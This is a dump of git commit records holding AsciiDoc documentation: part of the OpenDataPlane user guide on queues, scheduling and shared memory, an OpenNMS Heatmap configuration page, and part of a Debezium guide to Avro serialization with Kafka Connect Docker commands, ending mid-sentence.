flow:\n[list]\n* The pool that they will be stored in on receipt\n* The queue that they will be added to for processing\n\nThe PMRs supported by ODP permit flow determination based on combinations of\npacket field values (tuples). The main advantage of classification is that on\nmany platforms these functions are performed in hardware, meaning that\nclassification occurs at line rate as packets are being received without\nany explicit processing by the ODP application.\n\nNote that the use of the classifier is optional. Applications may directly\nreceive packets from a corresponding PktIO input queue via direct polling\nif they choose.\n\n=== Scheduler\nThe *Scheduler* provides a suite of APIs that control scalable event\nprocessing.\n\n.ODP Scheduler and Event Processing\nimage::odp_scheduling.svg[align=\"center\"]\n\nThe Scheduler is responsible for selecting and dispatching one or more events\nto a requesting thread. Event selection is based on several factors involving\nboth the queues containing schedulable events and the thread making an\n+odp_schedule()+ or +odp_schedule_multi()+ call.\n\nODP queues have a _scheduling priority_ that determines how urgently events\non them should be processed relative to events contained in other queues.\nQueues also have a _scheduler group id_ associated with them that must match\nthe associated scheduler group _thread mask_ of the thread calling the\nscheduler. This permits events to be grouped for processing into classes and\nhave threads that are dedicated to processing events from specified classes.\nThreads can join and leave scheduler groups dynamically, permitting easy\napplication response to increases in demand.\n\nWhen a thread receives an event from the scheduler, it in turn can invoke\nother processing engines via ODP APIs (_e.g.,_ crypto processing) that\ncan operate asynchronously. When such processing is complete, the result is\nthat a *completion event* is added to a schedulable queue where it can be\nscheduled back to a thread to continue processing with the results of the\nrequested asynchronous operation.\n\nThreads themselves can enqueue events to queues for downstream processing\nby other threads, permitting flexibility in how applications structure\nthemselves to maximize concurrency.\n\n=== Traffic Manager\nThe *Traffic Manager* provides a suite of APIs that control traffic shaping and\nQuality of Service (QoS) processing for packet output.\n\n.ODP Transmit processing with Traffic Manager\nimage::odp_traffic_manager.svg[align=\"center\"]\n\nThe final stage of packet processing is to transmit it. Here, applications have\nseveral choices. As with RX processing, applications may send packets\ndirectly to PktIO TX queues for direct transmission. Often, however,\napplications need to perform traffic shaping and related\n*Quality of Service (QoS)* processing on the packets comprising a flow as part\nof transmit processing. To handle this need, ODP provides a suite of\n*Traffic Manager* APIs that permit programmatic establishment of arbiters,\nshapers, etc. that control output packet processing to achieve desired QoS\ngoals. Again, the advantage here is that on many platforms traffic management\nfunctions are implemented in hardware, permitting transparent offload of\nthis work.\n\n== ODP Application Programming\nAt the highest level, an *ODP Application* is a program that uses one or more\nODP APIs. Because ODP is a framework rather than a programming environment,\napplications are free to also use other APIs that may or may not provide the\nsame portability characteristics as ODP APIs.\n\nODP applications vary in terms of what they do and how they operate, but in\ngeneral all share the following characteristics:\n\n. They are organized into one or more _threads_ that execute in parallel.\n. These threads communicate and coordinate their activities using various\n_synchronization_ mechanisms.\n. They receive packets from one or more _packet I\/O interfaces_.\n. They examine, transform, or otherwise process packets.\n. They transmit packets to one or more _packet I\/O interfaces_.\n\nODP provides APIs to assist in each of these areas.\n\n=== The include structure\nApplications only include the 'include\/odp.h' file, which includes the\n'platform\/<implementation name>\/include\/odp' files to provide a complete\ndefinition of the API on that platform. The doxygen documentation defining\nthe behavior of the ODP API is all contained in the public API files, and the\nactual definitions for an implementation will be found in the per platform\ndirectories. Per-platform data that might normally be a +#define+ can be\nrecovered via the appropriate access function if the #define is not directly\nvisible to the application.\n\n.Users include structure\n----\n.\/\n\u251c\u2500\u2500 include\/\n\u2502 \u251c\u2500\u2500 odp\/\n\u2502 \u2502 \u2514\u2500\u2500 api\/\n\u2502 \u2502 \u2514\u2500\u2500 The Public API and the documentation.\n\u2502 \u2502\n\u2502 \u2514\u2500\u2500 odp.h This file should be the only file included by the application.\n----\n\n=== Initialization\nIMPORTANT: ODP depends on the application to perform a graceful shutdown,\ncalling the terminate functions should only be done when the application is\nsure it has closed the ingress and subsequently drained all queues, etc.\n\n=== Startup\nThe first API that must be called by an ODP application is 'odp_init_global()'.\nThis takes two pointers. The first, +odp_init_t+, contains ODP initialization\ndata that is platform independent and portable, while the second,\n+odp_platform_init_t+, is passed unparsed to the implementation\nto be used for platform specific data that is not yet, or may never be\nsuitable for the ODP API.\n\nCalling odp_init_global() establishes the ODP API framework and MUST be\ncalled before any other ODP API may be called. Note that it is only called\nonce per application. Following global initialization, each thread in turn\ncalls 'odp_init_local()' is called. This establishes the local ODP thread\ncontext for that thread and MUST be called before other ODP APIs may be\ncalled by that thread.\n\n=== Shutdown\nShutdown is the logical reverse of the initialization procedure, with\n'odp_term_local()' called for each thread before 'odp_term_global()' is\ncalled to terminate ODP.\n\n.ODP Application Structure Flow Diagram\nimage::resource_management.svg[align=\"center\"]\n\n== Common Conventions\nMany ODP APIs share common conventions regarding their arguments and return\ntypes. This section highlights some of the more common and frequently used\nconventions.\n\n=== Handles and Special Designators\nODP resources are represented via _handles_ that have abstract type\n_odp_resource_t_. So pools are represented by handles of type +odp_pool_t+,\nqueues by handles of type +odp_queue_t+, etc. Each such type\nhas a distinguished type _ODP_RESOURCE_INVALID_ that is used to indicate a\nhandle that does not refer to a valid resource of that type. Resources are\ntypically created via an API named _odp_resource_create()_ that returns a\nhandle of type _odp_resource_t_ that represents the created object. This\nreturned handle is set to _ODP_RESOURCE_INVALID_ if, for example, the\nresource could not be created due to resource exhaustion. Invalid resources\ndo not necessarily represent error conditions. For example, +ODP_EVENT_INVALID+\nin response to an +odp_queue_deq()+ call to get an event from a queue simply\nindicates that the queue is empty.\n\n=== Addressing Scope\nUnless specifically noted in the API, all ODP resources are global to the ODP\napplication, whether it runs as a single process or multiple processes. ODP\nhandles therefore have common meaning within an ODP application but have no\nmeaning outside the scope of the application.\n\n=== Resources and Names\nMany ODP resource objects, such as pools and queues, support an\napplication-specified character string _name_ that is associated with an ODP\nobject at create time. This name serves two purposes: documentation, and\nlookup. The lookup function is particularly useful to allow an ODP application\nthat is divided into multiple processes to obtain the handle for the common\nresource.\n\n== Shared memory\n=== Allocating shared memory\nBlocks of shared memory can be created using the +odp_shm_reserve()+ API\ncall. The call expects a shared memory block name, a block size, an alignment\nrequirement, and optional flags as parameters. It returns a +odp_shm_t+\nhandle. The size and alignment requirement are given in bytes.\n\n.creating a block of shared memory\n[source,c]\n----\n#define ALIGNMENT 128\n#define BLKNAME \"shared_items\"\n\nodp_shm_t shm;\nuint32_t shm_flags = 0;\n\ntypedef struct {\n...\n} shared_data_t;\n\nshm = odp_shm_reserve(BLKNAME, sizeof(shared_data_t), ALIGNMENT, shm_flags);\n----\n\n=== Getting the shared memory block address\nThe returned odp_shm_t handle can then be used to retrieve the actual\naddress (in the caller's ODP thread virtual address space) of the created\nshared memory block.\n\n.getting the address of a shared memory block\n[source,c]\n----\nshared_data_t *shared_data;\nshared_data = odp_shm_addr(shm);\n----\n\nThe address returned by +odp_shm_addr()+ is valid only in the calling ODP\nthread space: odp_shm_t handles can be shared between ODP threads and remain\nvalid within any threads, whereas the address returned by +odp_shm_addr(shm)+\nmay differ from ODP threads to ODP threads (for the same 'shm' block), and\nshould therefore not be shared between ODP threads.\nFor instance, it would be correct to send a shm handle using IPC between two\nODP threads and let each of these thread do their own +odp_shm_addr()+ to\nget the block address. Directly sending the address returned by\n+odp_shm_addr()+ from one ODP thread to another would however possibly fail\n(the address may have no sense in the receiver address space).\n\nThe address returned by +odp_shm_addr()+ is nevertheless guaranteed to be\naligned according to the alignment requirements provided at block creation\ntime, even if the call to +odp_shm_addr()+ is performed by a different ODP\nthread than the one which originally called +odp_shm_reserve()+.\n\nAll shared memory blocks are contiguous in any ODP thread addressing space:\n'address' to 'address'\\+'size' (where 'size' is the shared memory block size,\nas provided in the +odp_shm_reserve()+ call) is read and writeable and\nmapping the shared memory block. There is no fragmentation.\n\n=== Memory behaviour\nBy default ODP threads are assumed to behave as cache coherent systems:\nAny change performed on a shared memory block is guaranteed to eventually\nbecome visible to other ODP threads sharing this memory block.\n(this behaviour may be altered by flags to +odp_shm_reserve()+ in the future).\nNevertheless, there is no implicit memory barrier associated with any action\non shared memories: *When* a change performed by an ODP thread becomes visible\nto another ODP thread is not known: An application using shared memory\nblocks has to use some memory barrier provided by ODP to guarantee shared data\nvalidity between ODP threads.\n\n=== Lookup by name\nAs mentioned, shared memory handles can be sent from ODP threads to ODP\nthreads using any IPC mechanism, and then the block address retrieved.\nA simpler approach to get the shared memory block handle of an already created\nblock is to use the +odp_shm_lookup()+ API function call.\nThis nevertheless requires the calling ODP thread to provide the name of the\nshared memory block:\n+odp_shm_lookup()+ will return +ODP_SHM_INVALID+ if no shared memory block\nwith the provided name is known by ODP.\n\n.retrieving a block handle and address from another ODP task\n[source,c]\n----\n#define BLKNAME \"shared_items\"\n\nodp_shm_t shm;\nshared_data_t *shared_data;\n\nshm = odp_shm_lookup(BLKNAME);\nif (shm != ODP_SHM_INVALID) {\n\tshared_data = odp_shm_addr(shm);\n\t...\n}\n----\n\n=== Freeing memory\nFreeing shared memory is performed using the +odp_shm_free()+ API call.\n+odp_shm_free()+ takes one single argument, the shared memory block handle.\nAny ODP thread is allowed to perform a +odp_shm_free()+ on a shared memory\nblock (i.e. the thread performing the +odp_shm_free()+ may be different\nfrom the thread which did the +odp_shm_reserve()+). Shared memory blocks should\nbe freed only once, and once freed, a shared memory block should no longer\nbe referenced by any ODP threads.\n\n.freeing a shared memory block\n[source,c]\n----\nif (odp_shm_free(shm) != 0) {\n\t...\/\/handle error\n}\n----\n\n=== Memory creation flags\nThe last argument to odp_shm_reserve() is a set of ORed flags.\nTwo flags are supported:\n\n==== ODP_SHM_PROC\nWhen this flag is given, the allocated shared memory will become visible\noutside ODP. Non ODP threads (e.g. usual linux process or linux threads)\nwill be able to access the memory using native (non ODP) OS calls such as\n'shm_open()' and 'mmap' (for linux).\nEach ODP implementation should provide a description on exactly how\nthis mapping should be done on that specific platform.\n\n==== ODP_SHM_SW_ONLY\nThis flag tells ODP that the shared memory will be used by the ODP application\nsoftware only: no HW (such as DMA, or other accelerator) will ever\ntry to access the memory. No other ODP call will be involved on this memory\n(as ODP calls could implicitly involve HW, depending on the ODP\nimplementation), except for +odp_shm_lookup()+ and +odp_shm_free()+.\nODP implementations may use this flag as a hint for performance optimization,\nor may as well ignore this flag.\n\n== Queues\nQueues are the fundamental event sequencing mechanism provided by ODP and all\nODP applications make use of them either explicitly or implicitly. Queues are\ncreated via the 'odp_queue_create()' API that returns a handle of type\n+odp_queue_t+ that is used to refer to this queue in all subsequent APIs that\nreference it. Queues have one of two ODP-defined _types_, POLL, and SCHED that\ndetermine how they are used. POLL queues directly managed by the ODP\napplication while SCHED queues make use of the *ODP scheduler* to provide\nautomatic scalable dispatching and synchronization services.\n\n.Operations on POLL queues\n[source,c]\n----\nodp_queue_t poll_q1 = odp_queue_create(\"poll queue 1\", ODP_QUEUE_TYPE_POLL, NULL);\nodp_queue_t poll_q2 = odp_queue_create(\"poll queue 2\", ODP_QUEUE_TYPE_POLL, NULL);\n...\nodp_event_t ev = odp_queue_deq(poll_q1);\n...do something\nint rc = odp_queue_enq(poll_q2, ev);\n----\n\nThe key distinction is that dequeueing events from POLL queues is an\napplication responsibility while dequeueing events from SCHED queues is the\nresponsibility of the ODP scheduler.\n\n.Operations on SCHED queues\n[source,c]\n----\nodp_queue_param_t qp;\nodp_queue_param_init(&qp);\nodp_schedule_prio_t prio = ...;\nodp_schedule_group_t sched_group = ...;\nqp.sched.prio = prio;\nqp.sched.sync = ODP_SCHED_SYNC_[NONE|ATOMIC|ORDERED];\nqp.sched.group = sched_group;\nqp.lock_count = n; \/* Only relevant for ordered queues *\/\nodp_queue_t sched_q1 = odp_queue_create(\"sched queue 1\", ODP_QUEUE_TYPE_SCHED, &qp);\n\n...thread init processing\n\nwhile (1) {\n odp_event_t ev;\n odp_queue_t which_q;\n ev = odp_schedule(&which_q, <wait option>);\n ...process the event\n}\n----\n\nWith scheduled queues, events are sent to a queue, and the sender chooses\na queue based on the service it needs. The sender does not need to know\nwhich ODP thread (on which core) or hardware accelerator will process\nthe event, but all the events on a queue are eventually scheduled and processed.\n\nAs can be seen, SCHED queues have additional attributes that are specified at\nqueue create that control how the scheduler is to process events contained\non them. These include group, priority, and synchronization class.\n\n=== Scheduler Groups\nThe scheduler's dispatching job is to return the next event from the highest\npriority SCHED queue that the caller is eligible to receive events from.\nThis latter consideration is determined by the queues _scheduler group_, which\nis set at queue create time, and by the caller's _scheduler group mask_ that\nindicates which scheduler group(s) it belongs to. Scheduler groups are\nrepresented by handles of type +odp_scheduler_group_t+ and are created by\nthe *odp_scheduler_group_create()* API. A number of scheduler groups are\n_predefined_ by ODP. These include +ODP_SCHED_GROUP_ALL+ (all threads),\n+ODP_SCHED_GROUP_WORKER+ (all worker threads), and +ODP_SCHED_GROUP_CONTROL+\n(all control threads). The application is free to create additional scheduler\ngroups for its own purpose and threads can join or leave scheduler groups\nusing the *odp_scheduler_group_join()* and *odp_scheduler_group_leave()* APIs\n\n=== Scheduler Priority\nThe +prio+ field of the +odp_queue_param_t+ specifies the queue's scheduling\npriority, which is how queues within eligible scheduler groups are selected\nfor dispatch. Queues have a default scheduling priority of NORMAL but can be\nset to HIGHEST or LOWEST according to application needs.\n\n=== Scheduler Synchronization\nIn addition to its dispatching function, which provide automatic scalability to\nODP applications in many core environments, the other main function of the\nscheduler is to provide event synchronization services that greatly simplify\napplication programming in a parallel processing environment. A queue's\nSYNC mode determines how the scheduler handles the synchronization processing\nof multiple events originating from the same queue.\n\nThree types of queue scheduler synchronization area supported: Parallel,\nAtomic, and Ordered.\n\n==== Parallel Queues\nSCHED queues that specify a sync mode of ODP_SCHED_SYNC_NONE are unrestricted\nin how events are processed.\n\n.Parallel Queue Scheduling\nimage::parallel_queue.svg[align=\"center\"]\n\nAll events held on parallel queues are eligible to be scheduled simultaneously\nand any required synchronization between them is the responsibility of the\napplication. Events originating from parallel queues thus have the highest\nthroughput rate, however they also potentially involve the most work on the\npart of the application. In the Figure above, four threads are calling\n*odp_schedule()* to obtain events to process. The scheduler has assigned\nthree events from the first queue to three threads in parallel. The fourth\nthread is processing a single event from the third queue. The second queue\nmight either be empty, of lower priority, or not in a scheduler group matching\nany of the threads being serviced by the scheduler.\n\n=== Atomic Queues\nAtomic queues simplify event synchronization because only a single thread may\nprocess event(s) from a given atomic queue at a time. Events scheduled from\natomic queues thus can be processed lock free because the locking is being\ndone implicitly by the scheduler. Note that the caller may receive one or\nmore events from the same atomic queue if *odp_schedule_multi()* is used. In\nthis case these multiple events all share the same atomic scheduling context.\n\n.Atomic Queue Scheduling\nimage::atomic_queue.svg[align=\"center\"]\n\nIn this example, no matter how many events may be held in an atomic queue,\nonly one calling thread can receive scheduled events from it at a time. Here\ntwo threads process events from two different atomic queues. Note that there\nis no synchronization between different atomic queues, only between events\noriginating from the same atomic queue. The queue context associated with the\natomic queue is held until the next call to the scheduler or until the\napplication explicitly releases it via a call to\n*odp_schedule_release_atomic()*.\n\nNote that while atomic queues simplify programming, the serial nature of\natomic queues may impair scaling.\n\n=== Ordered Queues\nOrdered queues provide the best of both worlds by providing the inherent\nscalability of parallel queues, with the easy synchronization of atomic\nqueues.\n\n.Ordered Queue Scheduling\nimage::ordered_queue.svg[align=\"center\"]\n\nWhen scheduling events from an ordered queue, the scheduler dispatches multiple\nevents from the queue in parallel to different threads, however the scheduler\nalso ensures that the relative sequence of these events on output queues\nis identical to their sequence from their originating ordered queue.\n\nAs with atomic queues, the ordering guarantees associated with ordered queues\nrefer to events originating from the same queue, not for those originating on\ndifferent queues. Thus in this figure three thread are processing events 5, 3,\nand 4, respectively from the first ordered queue. Regardless of how these\nthreads complete processing, these events will appear in their original\nrelative order on their output queue.\n\n==== Order Preservation\nRelative order is preserved independent of whether events are being sent to\ndifferent output queues. For example, if some events are sent to output queue\nA while others are sent to output queue B then the events on these output\nqueues will still be in the same relative order as they were on their\noriginating queue. Similarly, if the processing consumes events so that no\noutput is issued for some of them (_e.g.,_ as part of IP fragment reassembly\nprocessing) then other events will still be correctly ordered with respect to\nthese sequence gaps. Finally, if multiple events are enqueued for a given\norder (_e.g.,_ as part of packet segmentation processing for MTU\nconsiderations), then each of these events will occupy the originator's\nsequence in the target output queue(s). In this case the relative order of these\nevents will be in the order that the thread issued *odp_queue_enq()* calls for\nthem.\n\nThe ordered context associated with the dispatch of an event from an ordered\nqueue lasts until the next scheduler call or until explicitly released by\nthe thread calling *odp_schedule_release_ordered()*. This call may be used\nas a performance advisory that the thread no longer requires ordering\nguarantees for the current context. As a result, any subsequent enqueues\nwithin the current scheduler context will be treated as if the thread was\noperating in a parallel queue context.\n\n==== Ordered Locking\nAnother powerful feature of the scheduler's handling of ordered queues is\n*ordered locks*. Each ordered queue has associated with it a number of ordered\nlocks as specified by the _lock_count_ parameter at queue create time.\n\nOrdered locks provide an efficient means to perform in-order sequential\nprocessing within an ordered context. For example, supposed events with relative\norder 5, 6, and 7 are executing in parallel by three different threads. An\nordered lock will enable these threads to synchronize such that they can\nperform some critical section in their originating queue order. The number of\nordered locks supported for each ordered queue is implementation dependent (and\nqueryable via the *odp_config_max_ordered_locks_per_queue()* API). If the\nimplementation supports multiple ordered locks then these may be used to\nprotect different ordered critical sections within a given ordered context.\n\n==== Summary: Ordered Queues\nTo see how these considerations fit together, consider the following code:\n\n.Processing with Ordered Queues\n[source,c]\n----\nvoid worker_thread()\n odp_init_local();\n ...other initialization processing\n\n while (1) {\n ev = odp_schedule(&which_q, ODP_SCHED_WAIT);\n ...process events in parallel\n odp_schedule_order_lock(0);\n ...critical section processed in order\n odp_schedule_order_unlock(0);\n ...continue processing in parallel\n odp_queue_enq(dest_q, ev);\n }\n}\n----\n\nThis represents a simplified structure for a typical worker thread operating\non ordered queues. Multiple events are processed in parallel and the use of\nordered queues ensures that they will be placed on +dest_q+ in the same order\nas they originated. While processing in parallel, the use of ordered locks\nenables critical sections to be processed in order within the overall parallel\nflow. When a thread arrives at the *odp_schedule_order_lock()* call, it waits\nuntil the locking order for this lock for all prior events has been resolved\nand then enters the critical section. The *odp_schedule_order_unlock()* call\nreleases the critical section and allows the next order to enter it.\n\n=== Queue Scheduling Summary\n\nNOTE: Both ordered and parallel queues improve throughput over atomic queues\ndue to parallel event processing, but require that the application take\nsteps to ensure context data synchronization if needed.\n\n== Cryptographic services\n\nODP provides support for cryptographic operations required by various security\nprotocols (e.g. IPSec). To apply a cryptographic operation to a packet a session\nmust be created first. Packets processed by a session share the same cryptographic\nparameters like algorithms, keys, initialization vectors. A session is created with\n*odp_crypto_session_create()* call. After session creation a cryptographic operation\ncan be applied to a packet using *odp_crypto_operation()* call.\nDepending on the session type - synchronous or asynchronous the operation returns\nwhen the operation completed or after the request has been submitted. In the\nasynchronous case an operation completion event will be enqueued on the session\ncompletion queue. The completion event conveys the status of the operation and\nthe result. The application has the responsibility to free the completion event.\nThe operation arguments specify for each packet the areas which are to be encrypted\nor decrypted and authenticated. Also, in asynchronous case a context can be\nassociated with a given operation and when the operation completion event is\nretrieved the associated context can be retrieved. An operation can be executed\nin-place, when the output packet is the same as the input packet or the output\npacket can be a new packet provided by the application or allocated by the\nimplementation from the session output pool.\n\ninclude::..\/glossary.adoc[]\n","returncode":0,"stderr":"","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"7894d6eb6caf4a54d83cbd94a051aecfadb6424a","subject":"Added doc entry for the new option","message":"Added doc entry for the new option\n","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/webui\/heatmap\/introduction.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/webui\/heatmap\/introduction.adoc","new_contents":"\n\/\/ Allow GitHub image rendering\n:imagesdir: ..\/..\/..\/images\n=== Heatmap\n\nThe _Heatmap_ can be either be used to display unacknowledged alarms or to display ongoing outages\nof nodes. Each of this visualizations can be applied either on categories or on foreign sources of\nnodes. The sizing of an entity is calculated by counting the monitored services inside the entity.\nThus, a node with fewer services will appear in a smaller box than a node with more services.\n\nThe feature is by default deactivated and is configured through `opennms.properties`.\n\n.Heatmap visualizations of alarms\nimage:webui\/heatmap\/heatmap.png[]\n\n.Grafana Dashboard configuration properties\n[options=\"header, autowidth\"]\n|===\n| Name | Type | Description | Default\n| `org.opennms.heatmap.defaultMode` | _String_ | There exist two options for using the heatmap: `alarms` and\n `outages`. This option configures which are displayed per\n default.\n | `alarms`\n| `org.opennms.heatmap.defaultHeatmap` | _String_ | This option defines which _Heatmap_ is displayed by default.\n The two valid options are `categories` or `foreignSources` | `categories`\n| `org.opennms.heatmap.categoryFilter` | _String_ | The following option is used to filter for categories to be\n displayed in the _Heatmap_. This option uses the Java regular\n expression syntax. The default is `.*` so all categories will\n be displayed. | `.*`\n| `org.opennms.heatmap.foreignSourceFilter` | _String_ | The following option is used to filter for foreign sources\n to be displayed in the _Heatmap_. This option uses the Java\n regular expression syntax. The default is `.*` so all foreign\n sources will be displayed. | `.*`\n| `org.opennms.heatmap.onlyUnacknowledged` | _Boolean_ | This option configures whether only unacknowledged alarms\n will be taken into account when generating the alarm-based\n version of the _Heatmap_. | `false`\n| `org.opennms.web.console.centerUrl` | _String_ | You can also place the _Heatmap_ on the landing page by\n setting this option to `\/heatmap\/heatmap-box.jsp`. | `\/surveillance-box.jsp`\n|===\n\nTIP: You can use negative lookahead expressions for excluding categories you wish not to be displayed in the heatmap,\ne.g. by using an expression like `^(?!XY).*` you can filter out entities with names starting with `XY`.\n","old_contents":"\n\/\/ Allow GitHub image rendering\n:imagesdir: ..\/..\/..\/images\n=== Heatmap\n\nThe _Heatmap_ can be either be used to display unacknowledged alarms or to display ongoing outages\nof nodes. Each of this visualizations can be applied either on categories or on foreign sources of\nnodes. The sizing of an entity is calculated by counting the monitored services inside the entity.\nThus, a node with fewer services will appear in a smaller box than a node with more services.\n\nThe feature is by default deactivated and is configured through `opennms.properties`.\n\n.Heatmap visualizations of alarms\nimage:webui\/heatmap\/heatmap.png[]\n\n.Grafana Dashboard configuration properties\n[options=\"header, autowidth\"]\n|===\n| Name | Type | Description | Default\n| `org.opennms.heatmap.defaultMode` | _String_ | There exist two options for using the heatmap: `alarms` and\n `outages`. This option configures which are displayed per\n default.\n | `alarms`\n| `org.opennms.heatmap.defaultHeatmap` | _String_ | This option defines which _Heatmap_ is displayed by default.\n The two valid options are `categories` or `foreignSources` | `categories`\n| `org.opennms.heatmap.categoryFilter` | _String_ | The following option is used to filter for categories to be\n displayed in the _Heatmap_. This option uses the Java regular\n expression syntax. The default is `.*` so all categories will\n be displayed. | `.*`\n| `org.opennms.heatmap.foreignSourceFilter` | _String_ | The following option is used to filter for foreign sources\n to be displayed in the _Heatmap_. This option uses the Java\n regular expression syntax. The default is `.*` so all foreign\n sources will be displayed. | `.*`\n| `org.opennms.web.console.centerUrl` | _String_ | You can also place the _Heatmap_ on the landing page by\n setting this option to `\/heatmap\/heatmap-box.jsp`. | `\/surveillance-box.jsp`\n|===\n\nTIP: You can use negative lookahead expressions for excluding categories you wish not to be displayed in the heatmap,\ne.g. by using an expression like `^(?!XY).*` you can filter out entities with names starting with `XY`.\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"6d1d500d0cecaeb718e2717c956bd22c7e97356a","subject":"DBZ-271 Switching to \"one sentence per line\" style to facilite diffs of later changes","message":"DBZ-271 Switching to \"one sentence per line\" style to facilite diffs of later changes\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"docs\/configuration\/avro.asciidoc","new_file":"docs\/configuration\/avro.asciidoc","new_contents":"= Avro Serialization\n:awestruct-layout: doc\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\nDebezium connectors are used with the Kafka Connect framework to capture changes in databases and generate change events.\nThe Kafka Connect workers then apply to each of the messages generated by the connector the transformations configured for the connector,\nserialize each message key and value into a binary form using the worker's http:\/\/docs.confluent.io\/current\/connect\/concepts.html#connect-converters[_converters_],\nand finally write each messages into the correct Kafka topic.\n\nThe converters are specified in the the Kafka Connect worker configuration, and the same converters are used for all connectors deployed to that worker's cluster.\nKafka Connect comes with a _JSON converter_ that serialize the message keys and values into JSON documents,\nand the JSON converter can be configured to include or exclude the message schema using the (`key.converter.schemas.enable` and `value.converter.schemas.enable`) properties.\nOur link:\/docs\/tutorial[tutorial] shows what the messages look like when both payload and schemas are included, but the schemas make the messages very verbose.\nIf you want your messages serialized with JSON, consider setting these properties to `false` to exclude the verbose schema information.\n\nAnother option is to serialize the message keys and values using https:\/\/avro.apache.org\/[Apache Avro].\nThe Avro binary format is extremely compact and efficient, and Avro schemas make it possible to ensure that the messages have the correct structure.\nAvro's schema evolution mechanism makes it possible to evolve the schemas over time,\nwhich is essential for Debezium connectors that dynamically generate the message schemas to match the structure of the database tables.\nOver time, the change events captured by Debezium connectors and written by Kafka Connect into a topic may have different versions of the same schema,\nand Avro serialization makes it far easier for consumers to adapt to the changing schema.\n\nConfluent provides http:\/\/docs.confluent.io\/current\/schema-registry\/docs\/index.html[several components] that work with Avro:\n * An Avro Converter that can be used in Kafka Connect workers to map the Kafka Connect schemas into Avro schemas and to then use those Avro schemas to serialize the message keys and values into the very compact Avro binary form.\n * A Schema Registry that tracks all of the Avro schemas used in Kafka topics, and where the Avro Converter sends the generated Avro schemas.\n Since the Avro schemas are stored in this registry, each message need only include a tiny _schema identifier_.\n This makes each message even smaller, and for an I\/O bound system like Kafka this means more total throughput of the producers and consumers.\n * Avro _serdes_ (serializers and deserializers) for Kafka producers and consumers.\n Any Kafka consumer applications you write to consume change events can use the Avro serdes to deserialize the changes events.\n\nThese Confluent components are open source, and you can install them into any Kafka distribution and use them with Kafka Connect.\nHowever, Confluent also provides a https:\/\/www.confluent.io\/product\/confluent-open-source\/[Confluent Open Source Platform] that includes the standard Kafka distribution as well as these and other Confluent open source components, including several source and sink connectors.\nSome Docker images for Kafka Connect also contain the Avro converter. This includes recent link:\/docs\/docker\/[Debezium Docker images] that include the Debezium connectors, Kafka Connect, and the Avro converter.\n\n== Technical information\nA system that wants to use Avro serialization needs to complete two steps\n\n* Deploy a https:\/\/github.com\/confluentinc\/schema-registry[Schema Registry] instance\n* Use these properties to configure Apache Connect instance\n[source]\n----\nkey.converter=io.confluent.connect.avro.AvroConverter\nkey.converter.schema.registry.url=http:\/\/localhost:8081\nvalue.converter=io.confluent.connect.avro.AvroConverter\nvalue.converter.schema.registry.url=http:\/\/localhost:8081\n----\nNote: In addition to setting key\/value converters,it is *strongly recommended* to set internal key\/value converters to use JSON converters for easier analysis of stored configuration and offsets.\nIf you would still prefer to use Avro converter it is not possible now due to a https:\/\/issues.apache.org\/jira\/browse\/KAFKA-3988[known issue].\n[source]\n----\ninternal.key.converter=org.apache.kafka.connect.json.JsonConverter\ninternal.value.converter=org.apache.kafka.connect.json.JsonConverter\n----\n\n== Debezium Docker Images\nDeploy a Schema Registry instance\n[source]\n----\ndocker run -it --rm --name schema-registry \\\n --link zookeeper \\\n -e SCHEMA_REGISTRY_KAFKASTORE_CONNECTION_URL=zookeeper:2181 \\\n -e SCHEMA_REGISTRY_HOST_NAME=schema-registry \\\n -e SCHEMA_REGISTRY_LISTENERS=http:\/\/schema-registry:8081 \\\n -p 8181:8181 confluentinc\/cp-schema-registry\n----\nRun a Kafka Connect image configured to use Avro\n[source]\n----\ndocker run -it --rm --name connect \\\n --link zookeeper:zookeeper \\\n --link kafka:kafka \\\n --link mysql:mysql \\\n --link schema-registry:schema-registry \\\n -e GROUP_ID=1 \\\n -e CONFIG_STORAGE_TOPIC=my_connect_configs \\\n -e OFFSET_STORAGE_TOPIC=my_connect_offsets \\\n -e CONNECT_KEY_CONVERTER=io.confluent.connect.avro.AvroConverter \\\n -e CONNECT_VALUE_CONVERTER=io.confluent.connect.avro.AvroConverter \\\n -e CONNECT_INTERNAL_KEY_CONVERTER=org.apache.kafka.connect.json.JsonConverter \\\n -e CONNECT_INTERNAL_VALUE_CONVERTER=org.apache.kafka.connect.json.JsonConverter \\\n -e CONNECT_KEY_CONVERTER_SCHEMA_REGISTRY_URL=http:\/\/schema-registry:8081 \\\n -e CONNECT_VALUE_CONVERTER_SCHEMA_REGISTRY_URL=http:\/\/schema-registry:8081 \\\n -p 8083:8083 debezium\/connect:0.5\n----\n\n== Confluent Open Source\nPlease refer to http:\/\/docs.confluent.io\/current\/connect\/quickstart.html#goal-of-this-quickstart[a quickstart] in Confluent's documentation.\n","old_contents":"= Avro Serialization\n:awestruct-layout: doc\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\nDebezium connectors are used with the Kafka Connect framework to capture changes in databases and generate change events. The Kafka Connect workers then apply to each of the messages generated by the connector the transformations configured for the connector, serialize each message key and value into a binary form using the worker's http:\/\/docs.confluent.io\/current\/connect\/concepts.html#connect-converters[_converters_], and finally write each messages into the correct Kafka topic.\n\nThe converters are specified in the the Kafka Connect worker configuration, and the same converters are used for all connectors deployed to that worker's cluster. Kafka Connect comes with a _JSON converter_ that serialize the message keys and values into JSON documents, and the JSON converter can be configured to include or exclude the message schema using the (`key.converter.schemas.enable` and `value.converter.schemas.enable`) properties. Our link:\/docs\/tutorial[tutorial] shows what the messages look like when both payload and schemas are included, but the schemas make the messages very verbose. If you want your messages serialized with JSON, consider setting these properties to `false` to exclude the verbose schema information.\n\nAnother option is to serialize the message keys and values using https:\/\/avro.apache.org\/[Apache Avro]. The Avro binary format is extremely compact and efficient, and Avro schemas make it possible to ensure that the messages have the correct structure. Avro's schema evolution mechanism makes it possible to evolve the schemas over time, which is essential for Debezium connectors that dynamically generate the message schemas to match the structure of the database tables. Over time, the change events captured by Debezium connectors and written by Kafka Connect into a topic may have different versions of the same schema, and Avro serialization makes it far easier for consumers to adapt to the changing schema.\n\nConfluent provides 